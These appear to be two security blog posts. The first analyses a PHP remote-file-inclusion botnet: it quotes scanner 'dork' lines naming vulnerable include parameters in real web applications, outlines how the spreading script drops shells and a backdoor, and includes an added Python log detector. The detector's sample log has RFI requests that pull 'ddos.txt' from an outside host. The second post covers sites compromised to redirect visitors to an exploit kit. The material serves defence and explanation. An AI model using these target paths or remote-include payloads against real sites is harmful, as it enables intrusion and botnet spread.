The channel topic instructs members (aka bots) to download three files. The first is one we’ll call “dork”. It’s basically a config file for an RFI scanner in Perl that takes a massive file (over 4300 scan commands) to spread the botnet. There’s simply no shortage of RFI vulnerabilities out there in various projects.

!scan /tellmatic/include/libchart-1.1/libchart.php?tm_includepath= "Tellmatic 1.0.7.1" "Tellmatic 1.0.7.1"
!scan esupport/admin/autoclose.php?subd= "Powered By Kayako eSupport" "Powered By Kayako eSupport"
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE" asia "PHP-NUKE" asia
!scan /index.php?skin_file= "powered by Mp3 ToolBox 1.0 beta 5" "powered by Mp3 ToolBox 1.0 beta 5"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" cz "zeroboard" cz
!scan /config.inc.php?path_escape= "XZero"
!scan mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" de "/mambots/content/" de
!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License"
!scan /tools/send_reminders.php?noSet=0&includedir= WebCalendar
!scan phprojekt/lib/lib.inc.php?path_pre= /phprojekt/
!scan phprojekt/lib/lib.inc.php?path_pre= copyright ?2000-2005 Albrecht Guenther
...

The other two URLs point to c57 and c99 PHP shells.

These all work with a Perl script which we’ll call “dork.pl”. Basically it works as such:

  • Use search engines to find vulnerable systems: Google, AllTheWeb, GigaBlast, AOL, Yahoo, MSN, ASK, FireBall
  • Try to exploit the box:
    • First try a PHP ID script; if that works, move on and mail the author that it worked
    • Next try to load a PHP shell on the box; if that works, mail and move on to the next step
    • Now try to get the first stage “spreader” on the box; again, mail and move on if successful
    • Finally try to get the second stage “spreader” on the box; mail if successful
  • Once the box is exploited, all of the scripts are on the box: a PHP bot, a Perl bot (which is also an IRC bot, DDoS tool, and exploiter), and PHP shells.

Quite the sloppy setup, very much slapped together. The code could use a good refactoring as well; it has a lot of cut and paste going on. Crude but effective.

Once the PHP bot, in this case “ddos.txt”, drops and executes via the RFI exploit, it will drop another Perl script on the box; this one is a connect-back backdoor. It has the payload Base64-encoded in the PHP, so it simply opens a file in /tmp and drops it in there.
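As an added example (not the post’s code), the Python below is the web-server-side counterpart to the !scan lines quoted above: it reads Apache access-log lines and flags any query parameter whose value is a remote URL, rating a hit higher when the parameter name is one of the include-path names the dork list targets. The sample log lines, addresses and user agent are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the !scan lines quoted in this post.
KNOWN_INCLUDE_PARAMS = {
    "mosConfig_absolute_path", "phpbb_root_path", "includedir", "path_pre",
    "tm_includepath", "skin_file", "dir", "path_escape", "subd", "root",
    "thisdir", "full_path_to_public_program", "svr_rootP", "rage",
}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Only the client address and the request target are needed from each line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) ')


def rfi_findings(line: str) -> list:
    """Findings for one access-log line: every query parameter whose value is
    a remote URL. Returns [] for benign or unparseable lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    findings = []
    # parse_qsl also URL-decodes values, so a percent-encoded "http://" is caught.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        findings.append({
            "ip": m.group("ip"),
            "path": parts.path,
            "param": name,
            "payload": value,
            "payload_host": urlsplit(value).hostname,  # what to block / look up
            "confidence": "high" if name in KNOWN_INCLUDE_PARAMS else "medium",
        })
    return findings


def scan_log(lines) -> list:
    """Run rfi_findings over every line and flatten the results."""
    return [f for line in lines for f in rfi_findings(line)]


# Constructed sample log: two RFI probes, one normal request, one open-redirect
# style URL parameter, and one line that is not a log record at all.
SAMPLE_LOG = [
    '203.0.113.15 - - [13/Nov/2008:07:12:37 +0000] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://198.51.100.23/ddos.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '203.0.113.15 - - [13/Nov/2008:07:12:38 +0000] "GET /tools/send_reminders.php?noSet=0&includedir=http://198.51.100.23/ddos.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [13/Nov/2008:07:15:02 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Nov/2008:07:16:44 +0000] "GET /go.php?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    "garbage that is not a log line",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["confidence"], f["ip"], f["path"], f["param"], "->", f["payload_host"])
```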

In this case, the bots connect to IndoIRC and maybe irc.irchighway.net; neither network is terribly well known for its security practices, and both seem to tolerate or welcome botnet activities.

The great proliferation of RFI attacks, and the ease with which they can be tested and exploited with “frameworks” such as “dork.pl”, should give you great pause. We often see phishing sites set up on these boxes, and sometimes other nefarious activities hosted there as well. When folks have hundreds of vulnerabilities and thousands of boxes to easily test them against, they’ll strike it rich quickly. Death by a thousand cuts, and now you can see how it happens.

“Baiting” Web Surfers

By: Sunil James -

In case you haven’t already heard, a variety of websites, including those with content about “fish and tackle,” have been identified as having been compromised so that when people browse to the site, they’re then redirected to an alternate location, where the host is then compromised so that attackers can steal potentially sensitive data and employ the host itself to launch future attacks.

Fish and tackle….wow.

What I find particularly interesting about this is not the technical aspects of how exploitation occurs, but rather the measured approach employed by one or more individuals to execute such an attack. As with any product acquisition, the first step is for the buyer to identify a set of vendors with the desired product. In this case, the attacker acquired an exploitation framework that employed rigorous software engineering processes and was distributed and marketed in a fashion similar to mainstream software. By that, I mean that the framework purveyor(s) developed marketing collateral, offered tiered product and service pricing, and offered one year of support. From there, the attacker folded the tool into the pre-built network of compromised hosts and waited for users to be compromised; all the while being provided with up-to-date statistics about who was being exploited, what country they were based in, and what exploits were most effective.

Rather than employ web servers hosting illegitimate content, the attackers employed primarily Italian web servers hosting fairly benign content, including: tourism, hotels, automotive, movies and music. August in Italy is notorious for effectively being one long holiday. That makes these web servers ideal targets, as a multitude of vacationers (not just Italians or other Europeans) are visiting these sites and seeking information about how to spend the holiday.

This methodical approach is consistent with an unnerving trend of attackers employing re-usable systems for future financial gain (see Danny’s “Botconomics” post to learn all about this). In the short-term, the attackers will likely employ the stolen financial information to build a larger network of compromised hosts. The attackers themselves can subsequently utilize that network, or they can seek some sort of “ROI” by “leasing” out the network to other attackers. Either way, this case further emphasizes the importance of security vendors and service providers doing as much as possible to provide Internet users with as safe a browsing experience as possible. While hosts should certainly be patched as quickly as possible, network security vendors (like us) are working with service providers who own the “pipes,” thereby allowing us to attack this problem from a different, hopefully more successful, perspective.
